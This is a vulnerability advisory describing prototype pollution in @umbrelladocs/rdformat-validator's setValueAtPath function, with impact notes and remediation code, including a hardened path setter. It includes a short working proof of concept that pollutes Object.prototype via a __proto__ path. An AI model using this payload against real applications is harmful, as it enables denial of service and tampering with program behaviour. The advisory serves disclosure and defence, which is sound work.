Prototype Pollution in @umbrelladocs/rdformat-validator
Summary
@umbrelladocs/rdformat-validator (<= 1.0.0) is vulnerable to Prototype Pollution via @umbrelladocs/rdformat-validator.Fixer.prototype.setValueAtPath.
Description
The function @umbrelladocs/rdformat-validator.Fixer.prototype.setValueAtPath in @umbrelladocs/rdformat-validator does not properly restrict modifications to Object.prototype. When processing user-controlled input, an attacker can inject properties via __proto__ or constructor.prototype keys, polluting the prototype of all JavaScript objects in the application.
Attack vectors: array-path __proto__
Proof of Concept
const target = require('@umbrelladocs/rdformat-validator');
// 1. Pollute Object.prototype through the array path ["__proto__", "polluted"]
target.Fixer.prototype.setValueAtPath({}, ["__proto__", "polluted"], "yes");
// 2. Verify pollution
const obj = {};
console.log(obj.polluted); // "yes" - prototype is polluted
console.log('Vulnerable:', obj.polluted === 'yes');
Impact
Successful exploitation allows an attacker to:
- Cause Denial of Service (DoS) by overriding critical object methods like toString or hasOwnProperty
- Inject properties that affect all objects in the application
Remediation
Add key filtering to prevent prototype pollution:
function isSafe(key) {
  return key !== '__proto__' && key !== 'constructor' && key !== 'prototype';
}
Or use Object.create(null) for target objects to prevent prototype chain access.
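Both remediations combined in one path setter, as an added example that is not the package's own code: `safeSetValueAtPath`, `isSafeKey` and the `(target, path, value)` signature are assumptions modelled on the call in the Proof of Concept.

```javascript
'use strict';

// Keys that reach Object.prototype or a constructor's prototype.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isSafeKey(key) {
  // Accept only strings and non-negative integers, so the value that is
  // checked is exactly the value later used for property access.
  if (typeof key === 'number') return Number.isInteger(key) && key >= 0;
  return typeof key === 'string' && !BLOCKED_KEYS.has(key);
}

// Hypothetical hardened setter (assumed signature: target, array path, value).
function safeSetValueAtPath(target, path, value) {
  if (!Array.isArray(path) || path.length === 0) {
    throw new TypeError('path must be a non-empty array');
  }
  // Validate the whole path before touching the target.
  const bad = path.findIndex((key) => !isSafeKey(key));
  if (bad !== -1) throw new Error(`unsafe path segment at index ${bad}`);

  let node = target;
  for (let i = 0; i < path.length - 1; i++) {
    const key = path[i];
    // Descend only into own properties; never follow inherited ones.
    const own = Object.prototype.hasOwnProperty.call(node, key);
    const child = own ? node[key] : undefined;
    if (child === null || typeof child !== 'object') {
      // New containers are arrays for numeric segments, otherwise
      // prototype-less objects.
      node[key] = typeof path[i + 1] === 'number' ? [] : Object.create(null);
    }
    node = node[key];
  }
  node[path[path.length - 1]] = value;
  return target;
}

// Constructed sample inputs: one legitimate path, one path from the PoC.
function demo() {
  const doc = safeSetValueAtPath({}, ['diagnostics', 0, 'message'], 'fixed');
  let rejected = false;
  try {
    safeSetValueAtPath({}, ['__proto__', 'polluted'], 'yes');
  } catch (e) {
    rejected = true;
  }
  return { message: doc.diagnostics[0].message, rejected, polluted: {}.polluted };
}
```

Intermediate objects created this way have no prototype, so code that later calls methods such as hasOwnProperty directly on them must use Object.prototype.hasOwnProperty.call instead.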